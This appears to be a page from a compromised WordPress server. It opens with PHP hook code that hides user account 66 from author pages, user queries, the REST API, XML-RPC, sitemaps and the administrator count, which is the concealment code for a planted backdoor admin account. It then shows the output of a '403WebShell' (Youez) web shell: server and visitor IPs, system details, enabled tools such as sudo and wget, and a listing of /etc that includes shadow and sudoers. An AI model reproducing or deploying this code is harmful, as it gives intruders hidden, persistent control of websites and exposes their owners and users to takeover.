add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / snap /core24 /1644 /etc / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
April 10 2026 04:23:30
root / root
0755
X11
--
April 10 2026 04:23:29
root / root
0755
apparmor
--
April 10 2026 04:23:29
root / root
0755
apparmor.d
--
April 10 2026 04:23:29
root / root
0755
ca-certificates
--
April 10 2026 04:23:29
root / root
0755
cloud
--
April 10 2026 04:23:29
root / root
0755
credstore
--
March 24 2026 13:45:53
root / root
0700
credstore.encrypted
--
March 24 2026 13:45:53
root / root
0700
cron.d
--
April 10 2026 04:23:29
root / root
0755
dbus-1
--
April 10 2026 04:23:29
root / root
0755
default
--
April 10 2026 04:23:29
root / root
0755
depmod.d
--
April 10 2026 04:23:29
root / root
0755
dhcp
--
April 10 2026 04:23:29
root / root
0755
eac
--
April 10 2026 04:23:29
root / root
0755
fonts
--
April 10 2026 04:23:29
root / root
0755
gnutls
--
April 10 2026 04:23:29
root / root
0755
gss
--
April 10 2026 04:23:29
root / root
0755
ifplugd
--
April 10 2026 04:23:29
root / root
0755
init.d
--
April 10 2026 04:23:29
root / root
0755
iproute2
--
April 10 2026 04:23:29
root / root
0755
ld.so.conf.d
--
April 10 2026 04:23:29
root / root
0755
libnl-3
--
April 10 2026 04:23:29
root / root
0755
logcheck
--
April 10 2026 04:23:29
root / root
0755
logrotate.d
--
April 10 2026 04:23:29
root / root
0755
modprobe.d
--
April 10 2026 04:23:29
root / root
0755
modules-load.d
--
April 10 2026 04:23:29
root / root
0755
motd.d
--
April 10 2026 04:23:09
root / root
0755
netplan
--
April 10 2026 04:23:29
root / root
0755
network
--
April 10 2026 04:23:29
root / root
0755
pam.d
--
April 10 2026 04:23:29
root / root
0755
plymouth
--
April 10 2026 04:23:29
root / root
0755
polkit-1
--
April 10 2026 04:23:29
root / root
0755
profile.d
--
April 10 2026 04:23:29
root / root
0755
python3.12
--
April 10 2026 04:23:29
root / root
0755
rsyslog.d
--
April 10 2026 04:23:29
root / root
0755
security
--
April 10 2026 04:23:29
root / root
0755
sgml
--
April 10 2026 04:23:29
root / root
0755
skel
--
April 10 2026 04:23:29
root / root
0755
ssh
--
April 10 2026 04:23:29
root / root
0755
ssl
--
April 10 2026 04:23:29
root / root
0755
sudoers.d
--
April 10 2026 04:23:29
root / root
0755
sysctl.d
--
April 10 2026 04:23:29
root / root
0755
system-image
--
April 10 2026 04:23:29
root / root
0755
systemd
--
April 10 2026 04:23:29
root / root
0755
udev
--
April 10 2026 04:23:29
root / root
0755
ufw
--
April 10 2026 04:23:29
root / root
0755
update-motd.d
--
April 10 2026 04:23:09
root / root
0755
vim
--
April 10 2026 04:23:29
root / root
0755
wpa_supplicant
--
April 10 2026 04:23:29
root / root
0755
writable
--
April 10 2026 04:23:29
root / root
0755
xdg
--
April 10 2026 04:23:29
root / root
0755
xml
--
April 10 2026 04:23:29
root / root
0755
.pwd.lock
0 KB
February 10 2026 00:22:20
root / root
0600
.resolv.conf.systemd-resolved.bak
0.771 KB
April 10 2026 04:18:04
root / root
0644
bash.bashrc
2.265 KB
March 31 2024 08:41:03
root / root
0644
bash_completion
0.044 KB
January 24 2020 22:23:54
root / root
0644
bindresvport.blacklist
0.358 KB
August 02 2022 15:34:43
root / root
0644
ca-certificates.conf
6.141 KB
April 10 2026 04:19:09
root / root
0644
crypttab
0.053 KB
April 10 2026 04:21:14
root / root
0644
dhcpcd.conf
1.396 KB
November 13 2025 17:47:30
root / root
0644
e2scrub.conf
0.669 KB
April 08 2024 14:38:40
root / root
0644
environment
0.104 KB
April 10 2026 04:23:09
root / root
0644
ethertypes
1.81 KB
October 17 2022 22:36:59
root / root
0644
fstab
0.036 KB
February 10 2026 00:22:12
root / root
0644
fw_env.config
0.352 KB
April 10 2026 04:23:09
root / root
0644
group
0.75 KB
April 10 2026 04:18:04
root / root
0644
gshadow
0.623 KB
April 10 2026 04:18:04
root / shadow
0640
host.conf
0.09 KB
April 22 2024 13:04:27
root / root
0644
hostname
0.001 KB
April 10 2026 04:23:09
root / root
0644
hosts
0.155 KB
April 10 2026 04:17:02
root / root
0644
hosts.allow
0.401 KB
April 10 2026 04:21:22
root / root
0644
hosts.deny
0.694 KB
April 10 2026 04:21:22
root / root
0644
inputrc
1.831 KB
March 31 2024 08:21:18
root / root
0644
issue
0.026 KB
April 10 2026 04:17:02
root / root
0644
issue.net
0.016 KB
April 10 2026 04:17:02
root / root
0644
ld.so.cache
10.976 KB
April 10 2026 04:23:11
root / root
0644
ld.so.conf
0.033 KB
August 02 2022 15:34:43
root / root
0644
legal
0.261 KB
April 22 2024 13:04:27
root / root
0644
libaudit.conf
0.187 KB
March 31 2024 00:20:01
root / root
0644
locale.conf
0.013 KB
April 10 2026 04:22:13
root / root
0644
localtime
0.111 KB
June 23 2026 12:20:48
root / root
0644
login.defs
12.077 KB
April 10 2026 04:23:09
root / root
0644
lsb-release
0.102 KB
February 06 2026 07:22:44
root / root
0644
machine-id
0 KB
April 10 2026 04:23:09
root / root
0644
magic
0.108 KB
March 31 2024 07:35:22
root / root
0644
magic.mime
0.108 KB
March 31 2024 07:35:22
root / root
0644
mime.types
73.353 KB
July 12 2023 13:08:08
root / root
0644
mke2fs.conf
0.727 KB
April 10 2026 04:22:13
root / root
0644
modules
0.207 KB
April 10 2026 04:21:18
root / root
0644
netconfig
0.749 KB
March 31 2024 02:18:35
root / root
0644
nsswitch.conf
0.546 KB
April 10 2026 04:23:02
root / root
0644
os-release
0.173 KB
April 10 2026 04:23:09
root / root
0644
passwd
1.584 KB
April 10 2026 04:18:04
root / root
0644
profile
0.568 KB
April 22 2024 13:04:27
root / root
0644
protocols
3.07 KB
October 17 2022 22:19:05
root / root
0644
resolv.conf
0.001 KB
April 10 2026 04:23:15
root / root
0644
rpc
0.89 KB
October 17 2022 22:24:22
root / root
0644
services
12.513 KB
March 27 2021 22:32:57
root / root
0644
shadow
0.852 KB
April 10 2026 04:18:04
root / shadow
0640
shells
0.115 KB
February 10 2026 00:23:13
root / root
0644
subgid
0 KB
February 10 2026 00:22:20
root / root
0644
subuid
0 KB
February 10 2026 00:22:20
root / root
0644
sudo.conf
4.241 KB
March 02 2026 12:56:19
root / root
0644
sudo_logsrvd.conf
9.574 KB
March 02 2026 12:56:19
root / root
0644
sudoers
1.758 KB
January 29 2024 17:09:56
root / root
0440
ucf.conf
1.23 KB
January 27 2023 13:29:51
root / root
0644
vconsole.conf
0.01 KB
April 10 2026 04:22:13
root / root
0644
xattr.conf
0.665 KB
April 08 2024 15:54:10
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit